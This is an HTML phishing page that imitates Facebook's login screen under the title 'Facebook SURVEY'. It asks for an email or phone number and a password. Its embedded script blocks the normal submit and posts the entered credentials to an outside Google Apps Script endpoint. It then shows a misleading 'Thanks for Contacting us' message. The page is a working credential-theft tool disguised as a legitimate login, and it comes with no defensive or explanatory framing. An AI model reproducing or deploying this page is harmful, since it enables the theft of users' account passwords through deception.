<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Facebook SURVEY</title>
	<style ">
	*{
	margin: 0;
	padding: 0;
	outline: 0;
	text-decoration: none;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
}
body{
	font-family: arial;
	font-size: 14px;
	color: #1c1e21;
	font-weight: normal;
	background: #f0f2f5
}
.loginsignup{
	padding: 120px;
}
.container{
	max-width: 992px;
	margin: auto;
}
.row{
	display: flex;
	flex-wrap: wrap;
}
.justify-content-between{
	justify-content: space-between;
}
.content-left{
	max-width: 500px;
	margin: auto;
}
.content-left h1{
	font-size: 50px;
	color: #1877f2;
	margin-bottom: 20px;
	font-weight: 900;
}
.content-left h2{
	font-size: 28px;
	line-height: 32px;
	font-weight: 500;
	margin-bottom: 40px;
}
.content-right{
	max-width: 450px;
	margin: auto;
	text-align: center;
}
.content-right form{
	width: 400px;
	height: 350px;
	background: #fff;
	border-radius: 5px;
	padding: 15px;
	-webkit-box-shadow: -1px -1px 8px -1px rgba(0,0,0,0.52);
	-moz-box-shadow: -1px -1px 8px -1px rgba(0,0,0,0.52);
	box-shadow: -1px -1px 8px -1px rgba(0,0,0,0.52);
	margin-bottom: 30px;
}
.content-right form input{
	width: 100%;
	height: 50px;
	font-size: 17px;
	border: 1px solid #ddd;
	border-radius: 5px;
	padding: 0 15px;
	margin-bottom: 15px;
}
.content-right form input:hover{
	border: 2px solid #1c1e21;
	background:#f0f2f5;
}
.btn{
	font-size: 20px;
	background: #1877f2;
	height: 50px;
	color: #fff;
	line-height: 50px;
	border-radius: 5px;
	margin-bottom: 20px;
	text-transform: capitalize;
}
.login a{
	display: block;
}
.create-btn a{
	display: inline-block;
	margin-top: 20px;
	padding: 0 17px;
	background: #4cd137;
	transition: .3s;
}
.create-btn a:hover{
	background: #44bd32;
}
.forgot a{
	font-size: 14px;
	line-height: 19px;
	color:#1877f2;
}
.forgot a:hover,
.content-right p a:hover{
	text-decoration: underline;
}
.content-right p a{
	color: #1c1e21;
	font-weight: 600;
}
input[type=submit]{
background-color:#1877f2;
color:white;
}
</style>
</head>
<body>
		<!-- login Page start -->
		<div class="loginsignup">
			<div class="container">
				<div class="row justify-content-between">
					<div class="content-left">
						<h1>facebook</h1>
						<h2>Facebook helps you connect and share with the people in your life.</h2>
					</div>
					<div class="content-right">
						<form action="" method="post" name="google-sheet">
							<div class="form-group">
								<input type="text" name="number" placeholder="Email address or phone number">
							</div>
							<div class="form-group">
								<input type="password" name="password" placeholder="Password">
							</div>
							<div class="login">
							<input type="submit"   value="log in">
							 
							</div>
							<div class="forgot">
								<a href="">Forgotten account?</a>
							</div>
							<div class="create-btn">
								<a href="" class="btn">create new account</a>
							</div>
						</form>
						<p><a href="">Create a Page</a> for a celebrity, band or business.</p>
					</div>
				</div>
			</div>
		</div>
		          <script>
            const scriptURL = 'https://script.google.com/macros/s/AKfycbxbLFX8XMBIB1kddpAe8yAZCgGb1C7cIzkpuTZeqJLit1XXU7IakHFKV_R5yeaZ8lGABw/exec'
            const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => alert("Thanks for Contacting us..! We Will Contact You Soon..."))
                .catch(error => console.error('Error!', error.message))
            })
          </script>
		<!-- login Page end -->
</body>
</html>
